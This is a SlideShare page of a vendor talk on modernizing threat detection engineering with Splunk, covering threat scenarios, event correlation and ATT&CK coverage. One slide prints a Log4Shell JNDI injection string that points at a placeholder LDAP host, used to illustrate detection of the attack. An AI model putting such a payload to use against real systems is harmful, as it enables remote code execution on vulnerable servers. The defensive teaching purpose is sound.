SlideShare a Scribd company logo
ANVILOGIC Inc. C O N F I D E N T I A L
Modernizing Threat Detection Engineering
San Francisco Bay Area Splunk User Group
Virtual Meeting, October 5, 2022
ANVILOGIC Inc. C O N F I D E N T I A L 2
Andrew D’Auria - whoami?
● Director of Sales Engineering at Anvilogic
● Software industry since 1996
● CISSP since 2015
● Splunk, McAfee, Surfcontrol, NetForensics, RSA, and others
● Managing, coaching, and hiring Sales Engineers since 2018
● Native of NYC, living in Wake Forest, NC (Raleigh) since 2007
● Married to Ilissa for 24 years, with 2 daughters Jessica (17)
and Julie (14)
● Will play anything with frets, but especially electric guitar
since 1988
● Love to hike, grill, eat, drink, smoke a pipe/cigar, draw, paint
ANVILOGIC Inc. C O N F I D E N T I A L
Data Science Insights & Models
Core Security Operations Functions
3
Cloud Only
Detection Eng. Mature/Maintain
Accelerated Detection Insights, Improve
Purple Team / Threat Research
Hunt
Become Proactive
Triage
Smarter, Faster Analysis
Respond
Automate Response
ANVILOGIC Inc. C O N F I D E N T I A L 4
Detection Engineering - The Current Way
1. Manual Research
(ex. Google, Github)
Identify Threat Research 48 hr
2. Track / Feedback
(ex. JIRA)
Create Ticket 1 hr
3. Develop, Test, Deploy
(ex. SIEM)
Build Test
4. Document Use Case
(ex. Confluence)
Runbook 3 hr
Deploy 20 hr
5. Metrics & Reporting
(ex. Qlikview)
Maintain/Tune KPIs
Disjoint
People,
Process,
Technology
Start
End
3-5
Days Each
2-3+
Teams
5+
Tools
x 3
Times
=
+15D
Log4Shell Attack (3 Use
Cases (exploit, .exe, C2)
ANVILOGIC Inc. C O N F I D E N T I A L 5
1
Detection engineering is
● slow
● difficult
● results in noisy false
positives delivered to
the SOC
2 3
Bringing all data into a
centralized SIEM data
store is
● expensive
● difficult
especially in hybrid
cloud environments
There is no good way to
● track MITRE ATT&CK
technique coverage
● measure maturity
progress in real time
● identify gaps and
measure risk
What are the problems with detection engineering today?
ANVILOGIC Inc. C O N F I D E N T I A L
How can we measure the effectiveness of our DE program?
6
Collection
Detection
Response
• Data Coverage
• Data Quality
• Data Availability
• Detection Coverage
• Detection Quality
• Lifecycle Management
• Alert Management
• Workflow
• Speed
• Accuracy
Strategic Maturity
How Are We Performing?
How Can We Perform Better?
Where Can We Perform Better?
Organizational Risk?
Industry-Specific Risk?
Technology-Specific Risk?
Communicating Value?
Operational Maturity
ANVILOGIC Inc. C O N F I D E N T I A L
Typical vs. Ideal Detection → Pyramid of Pain
Typical
• IOC Driven
• Very time limited
• Lack of Context
• Whack-a-mole
Image Source: David Bianco’s blog - http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html
Ideal
• Tool & Behavior
Driven
• Very hard for
adversaries to change
• Long term strategic
value for detections
ANVILOGIC Inc. C O N F I D E N T I A L
Content 2.0
8
Events
Events of
Interest
Alerts
Traditional
Alerts
Threat Scenarios
Risk Thresholds
ANVILOGIC Inc. C O N F I D E N T I A L
Threat Identifiers and Threat Scenarios
9
Threat Scenario
Entity ‘X' Entity ‘X' Entity ‘X'
+ +
Threat Identifier
Event ID = “1234”
AND
(Process Name = “XYZ”
OR
Process Name = “ABC”)
Events of Interest
Event of Interest “A”
AND (60 Minutes)
Event of Interest “B”
AND (5 hours)
Event of Interest “C”
ANVILOGIC Inc. C O N F I D E N T I A L
Hunting Index - AKA: Events of Interest
● Correlating TTPs or Events of Interest
ANVILOGIC Inc. C O N F I D E N T I A L
Modern Security Operations
11
Hunt &
Correlate
Tag, Normalize,
Enrich
Case/Ticketing
& SOAR
Detection Engineering, Alerting, Triage, Hunting, and Response
Across Modern Hybrid Data Environments
Analyst Activity
Triage Threat
Scenarios
Auto-Threat
Detection
No Code -
Build Rules
Detection
Recommendations
Security & IT Products
(ex. EDR, AV, Cloud)
Logs
Logging Platforms
(ex. Splunk, Snowflake, Azure)
Query & Import
API
Query
API
Pull
API Store
Identifiers
(EOIs)
Demo...
ANVILOGIC Inc. C O N F I D E N T I A L 13
Example: Log4Shell Attack Pattern
Attacker Victim Security Operations Center Response
{$jndi:ldap://1.2.3.4/Exploit}
1
2
java.exe <Payload Class>
3
Establish C2
Detection
Engineers
Research, Test,
Document, Deploy
Alert 3
1000s alerts Alert 1
Alert 2
SOC
Triage
3-5
Days
Build MITRE Attack Detections
1 2 3
+ +
Easy Correlation -
No Code Required!
Initial Access Execution C2
Workspace
& Tasks
Track
Tune,
Versions
Test,
Deploy
Improve,
Mature
Maintain
Research
Exploit in Lab
Develop, Test,
Share
Threat Research
Reduce Alert Volume,
Improve Dwell Time
Attack Scenario
1 2 3
+ +
Triage
Under
2
Hours
Anvilogic Platform for Threat Detection, Investigation, and Response (TDIR)
ANVILOGIC Inc. C O N F I D E N T I A L
1
4
Example: Ransomware Attack Pattern
Start
Windows Macro
Execution
An employee opens a
malicious attachment
that runs a macro
Stage 1: Initial Access
1
Cobalt Strike
Abnormal Web
Connection
Machine makes abnormal
web connection to malware
payload domain and
establishes persistence
+60m
3
Stage 3: Command & Control
Stage 2: Installation
Encoded PowerShell
Command
Macro spawns an
encoded command in
powershell
+30s
2
Word Doc
Last Chance
to Detect!
Stage 4: Discovery
AD Find
Execution
Attacker uses adfind to
gather active directory
information for internal
reconnaissance
+60m
Batch File
</>
4
4 Rules 1 Correlation How Long?
+ =
+
ANVILOGIC Inc. C O N F I D E N T I A L 15
Anvilogic Impacts - 50B Financial Services
+180
EDR RULES
111
CLOUD
97
ENDPOINT
31
WEB
+403
CUSTOM
55
Azure Rules
Improved by +31%
20
AWS Rules
Improved by +75%
12
GCP Rules
Improved by +17%
24
O365 Rules
Improved by +21%
12
Proxy Rules
Improved by +30%
19
Web App Rules
Improved by +40%
55
Windows Rules
Improved by +55%
42
Linux Rules
Improved by +90%
180
EDR Rules
Linux & Windows
51
SCENARIOS
239
IDENTIFIERS
17
MACROS
8.14M
Warnings
300+
Identifiers
351
Alerts
10+
Scenarios
8.1T
Raw Events
4,000+
Sourcetypes
USE CASES
454
DEPLOYED
5.8
Alerts per day
UPLOADS
DOWNLOADS
~2m
● Increased Overall Detections by 91%
● Saved up to 6,500+ hours of engineering time
Anvilogic Framework Impacts
(60 Days)
ANVILOGIC Inc. C O N F I D E N T I A L
Key Takeaways
& Next Steps
● Effective detection engineering requires good
data, process, and measurement
● Not every detection requires an alert or action
● Build effective detections based on real-world
attack scenarios and risk thresholds
● Pyramid of pain whitepaper
https://www.anvilogic.com/learn/whitepaper-
pyramid-apex
● Subscribe to our Threat Report
anvilogic.com/resources/threat-report
Thank You!
adauria@anvilogic.com
anvilogic.com/resources/threat-report
https://www.anvilogic.com/learn/whitepaper-pyramid-apex

More Related Content

Similar to SF Bay Area Splunk User Group Meeting October 5, 2022

SplunkLive! Stockholm 2015 breakout - Analytics based security
SplunkLive! Stockholm 2015 breakout - Analytics based securitySplunkLive! Stockholm 2015 breakout - Analytics based security
SplunkLive! Stockholm 2015 breakout - Analytics based security
Splunk
 
Splunk for Enterprise Security Featuring UBA
Splunk for Enterprise Security Featuring UBASplunk for Enterprise Security Featuring UBA
Splunk for Enterprise Security Featuring UBA
Splunk
 
Threat Modeling All Day!
Threat Modeling All Day!Threat Modeling All Day!
Threat Modeling All Day!
Steven Carlson
 
The Future of DevSecOps
The Future of DevSecOpsThe Future of DevSecOps
The Future of DevSecOps
Stefan Streichsbier
 
Travis Perkins: Building a 'Lean SOC' over 'Legacy SOC'
Travis Perkins: Building a 'Lean SOC' over 'Legacy SOC'Travis Perkins: Building a 'Lean SOC' over 'Legacy SOC'
Travis Perkins: Building a 'Lean SOC' over 'Legacy SOC'
Splunk
 
Splunk for Enterprise Security featuring UBA Breakout Session
Splunk for Enterprise Security featuring UBA Breakout SessionSplunk for Enterprise Security featuring UBA Breakout Session
Splunk for Enterprise Security featuring UBA Breakout Session
Splunk
 
Security Breakout Session
Security Breakout Session Security Breakout Session
Security Breakout Session
Splunk
 
Behind the Curtain: Exposing Advanced Threats
Behind the Curtain: Exposing Advanced ThreatsBehind the Curtain: Exposing Advanced Threats
Behind the Curtain: Exposing Advanced Threats
Cisco Canada
 
Making Security Agile - Oleg Gryb
Making Security Agile - Oleg GrybMaking Security Agile - Oleg Gryb
Making Security Agile - Oleg Gryb
SeniorStoryteller
 
Solnet dev secops meetup
Solnet dev secops meetupSolnet dev secops meetup
Solnet dev secops meetup
pbink
 
Splunk Enterpise for Information Security Hands-On
Splunk Enterpise for Information Security Hands-OnSplunk Enterpise for Information Security Hands-On
Splunk Enterpise for Information Security Hands-On
Splunk
 
2014-12-16 defense news - shutdown the hackers
2014-12-16  defense news - shutdown the hackers2014-12-16  defense news - shutdown the hackers
2014-12-16 defense news - shutdown the hackers
Shawn Wells
 
Malware Most Wanted: Security Ecosystem
Malware Most Wanted: Security EcosystemMalware Most Wanted: Security Ecosystem
Malware Most Wanted: Security Ecosystem
Cyphort
 
SplunkSummit 2015 - Splunk User Behavioral Analytics
SplunkSummit 2015 - Splunk User Behavioral AnalyticsSplunkSummit 2015 - Splunk User Behavioral Analytics
SplunkSummit 2015 - Splunk User Behavioral Analytics
Splunk
 
Elizabeth Lawler - Devops, security, and compliance working in unison
Elizabeth Lawler - Devops, security, and compliance working in unisonElizabeth Lawler - Devops, security, and compliance working in unison
Elizabeth Lawler - Devops, security, and compliance working in unison
DevSecCon
 
IntelFlow: Toward adding Cyber Threat Intelligence to Software Defined Networ...
IntelFlow: Toward adding Cyber Threat Intelligence to Software Defined Networ...IntelFlow: Toward adding Cyber Threat Intelligence to Software Defined Networ...
IntelFlow: Toward adding Cyber Threat Intelligence to Software Defined Networ...
Open Networking Perú (Opennetsoft)
 
SplunkLive! Amsterdam 2015 - Analytics based security breakout
SplunkLive! Amsterdam 2015 - Analytics based security breakoutSplunkLive! Amsterdam 2015 - Analytics based security breakout
SplunkLive! Amsterdam 2015 - Analytics based security breakout
Splunk
 
AWS live hack: Atlassian + Snyk OSS on AWS
AWS live hack: Atlassian + Snyk OSS on AWSAWS live hack: Atlassian + Snyk OSS on AWS
AWS live hack: Atlassian + Snyk OSS on AWS
Eric Smalling
 
Who owns Software Security
Who owns Software SecurityWho owns Software Security
Who owns Software Security
devObjective
 
Who Owns Software Security?
Who Owns Software Security?Who Owns Software Security?
Who Owns Software Security?
ColdFusionConference
 

Similar to SF Bay Area Splunk User Group Meeting October 5, 2022 (20)

SplunkLive! Stockholm 2015 breakout - Analytics based security
SplunkLive! Stockholm 2015 breakout - Analytics based securitySplunkLive! Stockholm 2015 breakout - Analytics based security
SplunkLive! Stockholm 2015 breakout - Analytics based security
 
Splunk for Enterprise Security Featuring UBA
Splunk for Enterprise Security Featuring UBASplunk for Enterprise Security Featuring UBA
Splunk for Enterprise Security Featuring UBA
 
Threat Modeling All Day!
Threat Modeling All Day!Threat Modeling All Day!
Threat Modeling All Day!
 
The Future of DevSecOps
The Future of DevSecOpsThe Future of DevSecOps
The Future of DevSecOps
 
Travis Perkins: Building a 'Lean SOC' over 'Legacy SOC'
Travis Perkins: Building a 'Lean SOC' over 'Legacy SOC'Travis Perkins: Building a 'Lean SOC' over 'Legacy SOC'
Travis Perkins: Building a 'Lean SOC' over 'Legacy SOC'
 
Splunk for Enterprise Security featuring UBA Breakout Session
Splunk for Enterprise Security featuring UBA Breakout SessionSplunk for Enterprise Security featuring UBA Breakout Session
Splunk for Enterprise Security featuring UBA Breakout Session
 
Security Breakout Session
Security Breakout Session Security Breakout Session
Security Breakout Session
 
Behind the Curtain: Exposing Advanced Threats
Behind the Curtain: Exposing Advanced ThreatsBehind the Curtain: Exposing Advanced Threats
Behind the Curtain: Exposing Advanced Threats
 
Making Security Agile - Oleg Gryb
Making Security Agile - Oleg GrybMaking Security Agile - Oleg Gryb
Making Security Agile - Oleg Gryb
 
Solnet dev secops meetup
Solnet dev secops meetupSolnet dev secops meetup
Solnet dev secops meetup
 
Splunk Enterpise for Information Security Hands-On
Splunk Enterpise for Information Security Hands-OnSplunk Enterpise for Information Security Hands-On
Splunk Enterpise for Information Security Hands-On
 
2014-12-16 defense news - shutdown the hackers
2014-12-16  defense news - shutdown the hackers2014-12-16  defense news - shutdown the hackers
2014-12-16 defense news - shutdown the hackers
 
Malware Most Wanted: Security Ecosystem
Malware Most Wanted: Security EcosystemMalware Most Wanted: Security Ecosystem
Malware Most Wanted: Security Ecosystem
 
SplunkSummit 2015 - Splunk User Behavioral Analytics
SplunkSummit 2015 - Splunk User Behavioral AnalyticsSplunkSummit 2015 - Splunk User Behavioral Analytics
SplunkSummit 2015 - Splunk User Behavioral Analytics
 
Elizabeth Lawler - Devops, security, and compliance working in unison
Elizabeth Lawler - Devops, security, and compliance working in unisonElizabeth Lawler - Devops, security, and compliance working in unison
Elizabeth Lawler - Devops, security, and compliance working in unison
 
IntelFlow: Toward adding Cyber Threat Intelligence to Software Defined Networ...
IntelFlow: Toward adding Cyber Threat Intelligence to Software Defined Networ...IntelFlow: Toward adding Cyber Threat Intelligence to Software Defined Networ...
IntelFlow: Toward adding Cyber Threat Intelligence to Software Defined Networ...
 
SplunkLive! Amsterdam 2015 - Analytics based security breakout
SplunkLive! Amsterdam 2015 - Analytics based security breakoutSplunkLive! Amsterdam 2015 - Analytics based security breakout
SplunkLive! Amsterdam 2015 - Analytics based security breakout
 
AWS live hack: Atlassian + Snyk OSS on AWS
AWS live hack: Atlassian + Snyk OSS on AWSAWS live hack: Atlassian + Snyk OSS on AWS
AWS live hack: Atlassian + Snyk OSS on AWS
 
Who owns Software Security
Who owns Software SecurityWho owns Software Security
Who owns Software Security
 
Who Owns Software Security?
Who Owns Software Security?Who Owns Software Security?
Who Owns Software Security?
 

More from Becky Burwell

SFBA Splunk Usergroup meeting March 13, 2024
SFBA Splunk Usergroup meeting March 13, 2024SFBA Splunk Usergroup meeting March 13, 2024
SFBA Splunk Usergroup meeting March 13, 2024
Becky Burwell
 
SFBA Splunk Usergroup meeting December 14, 2023
SFBA Splunk Usergroup meeting December 14, 2023SFBA Splunk Usergroup meeting December 14, 2023
SFBA Splunk Usergroup meeting December 14, 2023
Becky Burwell
 
SFBA_SUG_2023-08-02.pdf
SFBA_SUG_2023-08-02.pdfSFBA_SUG_2023-08-02.pdf
SFBA_SUG_2023-08-02.pdf
Becky Burwell
 
SFBA Splunk Usergroup meeting May 3, 2023
SFBA Splunk Usergroup meeting May 3, 2023SFBA Splunk Usergroup meeting May 3, 2023
SFBA Splunk Usergroup meeting May 3, 2023
Becky Burwell
 
SFBA Splunk User Group Meeting February 2023
SFBA Splunk User Group Meeting February 2023SFBA Splunk User Group Meeting February 2023
SFBA Splunk User Group Meeting February 2023
Becky Burwell
 
SFBA Splunk Usergroup meeting December 2022
SFBA Splunk Usergroup meeting December 2022SFBA Splunk Usergroup meeting December 2022
SFBA Splunk Usergroup meeting December 2022
Becky Burwell
 
SFBA Usergroup meeting November 2, 2022
SFBA Usergroup meeting November 2, 2022SFBA Usergroup meeting November 2, 2022
SFBA Usergroup meeting November 2, 2022
Becky Burwell
 
SFBA Splunk User Group Meeting August 10, 2022
SFBA Splunk User Group Meeting August 10, 2022SFBA Splunk User Group Meeting August 10, 2022
SFBA Splunk User Group Meeting August 10, 2022
Becky Burwell
 
SFBA Splunk Usergroup meeting July 13, 2022
SFBA Splunk Usergroup meeting July 13, 2022SFBA Splunk Usergroup meeting July 13, 2022
SFBA Splunk Usergroup meeting July 13, 2022
Becky Burwell
 
designing-resilient-cloud-native-splunk-arch-in-aws-austin-rose.pdf
designing-resilient-cloud-native-splunk-arch-in-aws-austin-rose.pdfdesigning-resilient-cloud-native-splunk-arch-in-aws-austin-rose.pdf
designing-resilient-cloud-native-splunk-arch-in-aws-austin-rose.pdf
Becky Burwell
 
Splunking configfiles 20211208_daniel_wilson
Splunking configfiles 20211208_daniel_wilsonSplunking configfiles 20211208_daniel_wilson
Splunking configfiles 20211208_daniel_wilson
Becky Burwell
 
Getting Started with Splunk Observability September 8, 2021
Getting Started with Splunk Observability September 8, 2021Getting Started with Splunk Observability September 8, 2021
Getting Started with Splunk Observability September 8, 2021
Becky Burwell
 
Advanced Outlier Detection and Noise Reduction with Splunk & MLTK August 11, ...
Advanced Outlier Detection and Noise Reduction with Splunk & MLTK August 11, ...Advanced Outlier Detection and Noise Reduction with Splunk & MLTK August 11, ...
Advanced Outlier Detection and Noise Reduction with Splunk & MLTK August 11, ...
Becky Burwell
 

More from Becky Burwell (13)

SFBA Splunk Usergroup meeting March 13, 2024
SFBA Splunk Usergroup meeting March 13, 2024SFBA Splunk Usergroup meeting March 13, 2024
SFBA Splunk Usergroup meeting March 13, 2024
 
SFBA Splunk Usergroup meeting December 14, 2023
SFBA Splunk Usergroup meeting December 14, 2023SFBA Splunk Usergroup meeting December 14, 2023
SFBA Splunk Usergroup meeting December 14, 2023
 
SFBA_SUG_2023-08-02.pdf
SFBA_SUG_2023-08-02.pdfSFBA_SUG_2023-08-02.pdf
SFBA_SUG_2023-08-02.pdf
 
SFBA Splunk Usergroup meeting May 3, 2023
SFBA Splunk Usergroup meeting May 3, 2023SFBA Splunk Usergroup meeting May 3, 2023
SFBA Splunk Usergroup meeting May 3, 2023
 
SFBA Splunk User Group Meeting February 2023
SFBA Splunk User Group Meeting February 2023SFBA Splunk User Group Meeting February 2023
SFBA Splunk User Group Meeting February 2023
 
SFBA Splunk Usergroup meeting December 2022
SFBA Splunk Usergroup meeting December 2022SFBA Splunk Usergroup meeting December 2022
SFBA Splunk Usergroup meeting December 2022
 
SFBA Usergroup meeting November 2, 2022
SFBA Usergroup meeting November 2, 2022SFBA Usergroup meeting November 2, 2022
SFBA Usergroup meeting November 2, 2022
 
SFBA Splunk User Group Meeting August 10, 2022
SFBA Splunk User Group Meeting August 10, 2022SFBA Splunk User Group Meeting August 10, 2022
SFBA Splunk User Group Meeting August 10, 2022
 
SFBA Splunk Usergroup meeting July 13, 2022
SFBA Splunk Usergroup meeting July 13, 2022SFBA Splunk Usergroup meeting July 13, 2022
SFBA Splunk Usergroup meeting July 13, 2022
 
designing-resilient-cloud-native-splunk-arch-in-aws-austin-rose.pdf
designing-resilient-cloud-native-splunk-arch-in-aws-austin-rose.pdfdesigning-resilient-cloud-native-splunk-arch-in-aws-austin-rose.pdf
designing-resilient-cloud-native-splunk-arch-in-aws-austin-rose.pdf
 
Splunking configfiles 20211208_daniel_wilson
Splunking configfiles 20211208_daniel_wilsonSplunking configfiles 20211208_daniel_wilson
Splunking configfiles 20211208_daniel_wilson
 
Getting Started with Splunk Observability September 8, 2021
Getting Started with Splunk Observability September 8, 2021Getting Started with Splunk Observability September 8, 2021
Getting Started with Splunk Observability September 8, 2021
 
Advanced Outlier Detection and Noise Reduction with Splunk & MLTK August 11, ...
Advanced Outlier Detection and Noise Reduction with Splunk & MLTK August 11, ...Advanced Outlier Detection and Noise Reduction with Splunk & MLTK August 11, ...
Advanced Outlier Detection and Noise Reduction with Splunk & MLTK August 11, ...
 

Recently uploaded

一比一原版(CBU毕业证)卡普顿大学毕业证如何办理
一比一原版(CBU毕业证)卡普顿大学毕业证如何办理一比一原版(CBU毕业证)卡普顿大学毕业证如何办理
一比一原版(CBU毕业证)卡普顿大学毕业证如何办理
ahzuo
 
一比一原版(GWU,GW文凭证书)乔治·华盛顿大学毕业证如何办理
一比一原版(GWU,GW文凭证书)乔治·华盛顿大学毕业证如何办理一比一原版(GWU,GW文凭证书)乔治·华盛顿大学毕业证如何办理
一比一原版(GWU,GW文凭证书)乔治·华盛顿大学毕业证如何办理
bopyb
 
06-04-2024 - NYC Tech Week - Discussion on Vector Databases, Unstructured Dat...
06-04-2024 - NYC Tech Week - Discussion on Vector Databases, Unstructured Dat...06-04-2024 - NYC Tech Week - Discussion on Vector Databases, Unstructured Dat...
06-04-2024 - NYC Tech Week - Discussion on Vector Databases, Unstructured Dat...
Timothy Spann
 
Analysis insight about a Flyball dog competition team's performance
Analysis insight about a Flyball dog competition team's performanceAnalysis insight about a Flyball dog competition team's performance
Analysis insight about a Flyball dog competition team's performance
roli9797
 
一比一原版(Bradford毕业证书)布拉德福德大学毕业证如何办理
一比一原版(Bradford毕业证书)布拉德福德大学毕业证如何办理一比一原版(Bradford毕业证书)布拉德福德大学毕业证如何办理
一比一原版(Bradford毕业证书)布拉德福德大学毕业证如何办理
mbawufebxi
 
Global Situational Awareness of A.I. and where its headed
Global Situational Awareness of A.I. and where its headedGlobal Situational Awareness of A.I. and where its headed
Global Situational Awareness of A.I. and where its headed
vikram sood
 
Learn SQL from basic queries to Advance queries
Learn SQL from basic queries to Advance queriesLearn SQL from basic queries to Advance queries
Learn SQL from basic queries to Advance queries
manishkhaire30
 
原版制作(swinburne毕业证书)斯威本科技大学毕业证毕业完成信一模一样
原版制作(swinburne毕业证书)斯威本科技大学毕业证毕业完成信一模一样原版制作(swinburne毕业证书)斯威本科技大学毕业证毕业完成信一模一样
原版制作(swinburne毕业证书)斯威本科技大学毕业证毕业完成信一模一样
u86oixdj
 
The affect of service quality and online reviews on customer loyalty in the E...
The affect of service quality and online reviews on customer loyalty in the E...The affect of service quality and online reviews on customer loyalty in the E...
The affect of service quality and online reviews on customer loyalty in the E...
jerlynmaetalle
 
一比一原版(UCSF文凭证书)旧金山分校毕业证如何办理
一比一原版(UCSF文凭证书)旧金山分校毕业证如何办理一比一原版(UCSF文凭证书)旧金山分校毕业证如何办理
一比一原版(UCSF文凭证书)旧金山分校毕业证如何办理
nuttdpt
 
一比一原版(爱大毕业证书)爱丁堡大学毕业证如何办理
一比一原版(爱大毕业证书)爱丁堡大学毕业证如何办理一比一原版(爱大毕业证书)爱丁堡大学毕业证如何办理
一比一原版(爱大毕业证书)爱丁堡大学毕业证如何办理
g4dpvqap0
 
06-04-2024 - NYC Tech Week - Discussion on Vector Databases, Unstructured Dat...
06-04-2024 - NYC Tech Week - Discussion on Vector Databases, Unstructured Dat...06-04-2024 - NYC Tech Week - Discussion on Vector Databases, Unstructured Dat...
06-04-2024 - NYC Tech Week - Discussion on Vector Databases, Unstructured Dat...
Timothy Spann
 
一比一原版(UniSA毕业证书)南澳大学毕业证如何办理
一比一原版(UniSA毕业证书)南澳大学毕业证如何办理一比一原版(UniSA毕业证书)南澳大学毕业证如何办理
一比一原版(UniSA毕业证书)南澳大学毕业证如何办理
slg6lamcq
 
办(uts毕业证书)悉尼科技大学毕业证学历证书原版一模一样
办(uts毕业证书)悉尼科技大学毕业证学历证书原版一模一样办(uts毕业证书)悉尼科技大学毕业证学历证书原版一模一样
办(uts毕业证书)悉尼科技大学毕业证学历证书原版一模一样
apvysm8
 
一比一原版(Deakin毕业证书)迪肯大学毕业证如何办理
一比一原版(Deakin毕业证书)迪肯大学毕业证如何办理一比一原版(Deakin毕业证书)迪肯大学毕业证如何办理
一比一原版(Deakin毕业证书)迪肯大学毕业证如何办理
oz8q3jxlp
 
一比一原版(UMN文凭证书)明尼苏达大学毕业证如何办理
一比一原版(UMN文凭证书)明尼苏达大学毕业证如何办理一比一原版(UMN文凭证书)明尼苏达大学毕业证如何办理
一比一原版(UMN文凭证书)明尼苏达大学毕业证如何办理
nyfuhyz
 
Challenges of Nation Building-1.pptx with more important
Challenges of Nation Building-1.pptx with more importantChallenges of Nation Building-1.pptx with more important
Challenges of Nation Building-1.pptx with more important
Sm321
 
Nanandann Nilekani's ppt On India's .pdf
Nanandann Nilekani's ppt On India's .pdfNanandann Nilekani's ppt On India's .pdf
Nanandann Nilekani's ppt On India's .pdf
eddie19851
 
State of Artificial intelligence Report 2023
State of Artificial intelligence Report 2023State of Artificial intelligence Report 2023
State of Artificial intelligence Report 2023
kuntobimo2016
 
Malana- Gimlet Market Analysis (Portfolio 2)
Malana- Gimlet Market Analysis (Portfolio 2)Malana- Gimlet Market Analysis (Portfolio 2)
Malana- Gimlet Market Analysis (Portfolio 2)
TravisMalana
 

Recently uploaded (20)

一比一原版(CBU毕业证)卡普顿大学毕业证如何办理
一比一原版(CBU毕业证)卡普顿大学毕业证如何办理一比一原版(CBU毕业证)卡普顿大学毕业证如何办理
一比一原版(CBU毕业证)卡普顿大学毕业证如何办理
 
一比一原版(GWU,GW文凭证书)乔治·华盛顿大学毕业证如何办理
一比一原版(GWU,GW文凭证书)乔治·华盛顿大学毕业证如何办理一比一原版(GWU,GW文凭证书)乔治·华盛顿大学毕业证如何办理
一比一原版(GWU,GW文凭证书)乔治·华盛顿大学毕业证如何办理
 
06-04-2024 - NYC Tech Week - Discussion on Vector Databases, Unstructured Dat...
06-04-2024 - NYC Tech Week - Discussion on Vector Databases, Unstructured Dat...06-04-2024 - NYC Tech Week - Discussion on Vector Databases, Unstructured Dat...
06-04-2024 - NYC Tech Week - Discussion on Vector Databases, Unstructured Dat...
 
Analysis insight about a Flyball dog competition team's performance
Analysis insight about a Flyball dog competition team's performanceAnalysis insight about a Flyball dog competition team's performance
Analysis insight about a Flyball dog competition team's performance
 
一比一原版(Bradford毕业证书)布拉德福德大学毕业证如何办理
一比一原版(Bradford毕业证书)布拉德福德大学毕业证如何办理一比一原版(Bradford毕业证书)布拉德福德大学毕业证如何办理
一比一原版(Bradford毕业证书)布拉德福德大学毕业证如何办理
 
Global Situational Awareness of A.I. and where its headed
Global Situational Awareness of A.I. and where its headedGlobal Situational Awareness of A.I. and where its headed
Global Situational Awareness of A.I. and where its headed
 
Learn SQL from basic queries to Advance queries
Learn SQL from basic queries to Advance queriesLearn SQL from basic queries to Advance queries
Learn SQL from basic queries to Advance queries
 
原版制作(swinburne毕业证书)斯威本科技大学毕业证毕业完成信一模一样
原版制作(swinburne毕业证书)斯威本科技大学毕业证毕业完成信一模一样原版制作(swinburne毕业证书)斯威本科技大学毕业证毕业完成信一模一样
原版制作(swinburne毕业证书)斯威本科技大学毕业证毕业完成信一模一样
 
The affect of service quality and online reviews on customer loyalty in the E...
The affect of service quality and online reviews on customer loyalty in the E...The affect of service quality and online reviews on customer loyalty in the E...
The affect of service quality and online reviews on customer loyalty in the E...
 
一比一原版(UCSF文凭证书)旧金山分校毕业证如何办理
一比一原版(UCSF文凭证书)旧金山分校毕业证如何办理一比一原版(UCSF文凭证书)旧金山分校毕业证如何办理
一比一原版(UCSF文凭证书)旧金山分校毕业证如何办理
 
一比一原版(爱大毕业证书)爱丁堡大学毕业证如何办理
一比一原版(爱大毕业证书)爱丁堡大学毕业证如何办理一比一原版(爱大毕业证书)爱丁堡大学毕业证如何办理
一比一原版(爱大毕业证书)爱丁堡大学毕业证如何办理
 
06-04-2024 - NYC Tech Week - Discussion on Vector Databases, Unstructured Dat...
06-04-2024 - NYC Tech Week - Discussion on Vector Databases, Unstructured Dat...06-04-2024 - NYC Tech Week - Discussion on Vector Databases, Unstructured Dat...
06-04-2024 - NYC Tech Week - Discussion on Vector Databases, Unstructured Dat...
 
一比一原版(UniSA毕业证书)南澳大学毕业证如何办理
一比一原版(UniSA毕业证书)南澳大学毕业证如何办理一比一原版(UniSA毕业证书)南澳大学毕业证如何办理
一比一原版(UniSA毕业证书)南澳大学毕业证如何办理
 
办(uts毕业证书)悉尼科技大学毕业证学历证书原版一模一样
办(uts毕业证书)悉尼科技大学毕业证学历证书原版一模一样办(uts毕业证书)悉尼科技大学毕业证学历证书原版一模一样
办(uts毕业证书)悉尼科技大学毕业证学历证书原版一模一样
 
一比一原版(Deakin毕业证书)迪肯大学毕业证如何办理
一比一原版(Deakin毕业证书)迪肯大学毕业证如何办理一比一原版(Deakin毕业证书)迪肯大学毕业证如何办理
一比一原版(Deakin毕业证书)迪肯大学毕业证如何办理
 
一比一原版(UMN文凭证书)明尼苏达大学毕业证如何办理
一比一原版(UMN文凭证书)明尼苏达大学毕业证如何办理一比一原版(UMN文凭证书)明尼苏达大学毕业证如何办理
一比一原版(UMN文凭证书)明尼苏达大学毕业证如何办理
 
Challenges of Nation Building-1.pptx with more important
Challenges of Nation Building-1.pptx with more importantChallenges of Nation Building-1.pptx with more important
Challenges of Nation Building-1.pptx with more important
 
Nanandann Nilekani's ppt On India's .pdf
Nanandann Nilekani's ppt On India's .pdfNanandann Nilekani's ppt On India's .pdf
Nanandann Nilekani's ppt On India's .pdf
 
State of Artificial intelligence Report 2023
State of Artificial intelligence Report 2023State of Artificial intelligence Report 2023
State of Artificial intelligence Report 2023
 
Malana- Gimlet Market Analysis (Portfolio 2)
Malana- Gimlet Market Analysis (Portfolio 2)Malana- Gimlet Market Analysis (Portfolio 2)
Malana- Gimlet Market Analysis (Portfolio 2)
 

SF Bay Area Splunk User Group Meeting October 5, 2022

  • 1. ANVILOGIC Inc. C O N F I D E N T I A L Modernizing Threat Detection Engineering San Francisco Bay Area Splunk User Group Virtual Meeting, October 5, 2022
  • 2. ANVILOGIC Inc. C O N F I D E N T I A L 2 Andrew D’Auria - whoami? ● Director of Sales Engineering at Anvilogic ● Software industry since 1996 ● CISSP since 2015 ● Splunk, McAfee, Surfcontrol, NetForensics, RSA, and others ● Managing, coaching, and hiring Sales Engineers since 2018 ● Native of NYC, living in Wake Forest, NC (Raleigh) since 2007 ● Married to Ilissa for 24 years, with 2 daughters Jessica (17) and Julie (14) ● Will play anything with frets, but especially electric guitar since 1988 ● Love to hike, grill, eat, drink, smoke a pipe/cigar, draw, paint
  • 3. ANVILOGIC Inc. C O N F I D E N T I A L Data Science Insights & Models Core Security Operations Functions 3 Cloud Only Detection Eng. Mature/Maintain Accelerated Detection Insights, Improve Purple Team / Threat Research Hunt Become Proactive Triage Smarter, Faster Analysis Respond Automate Response
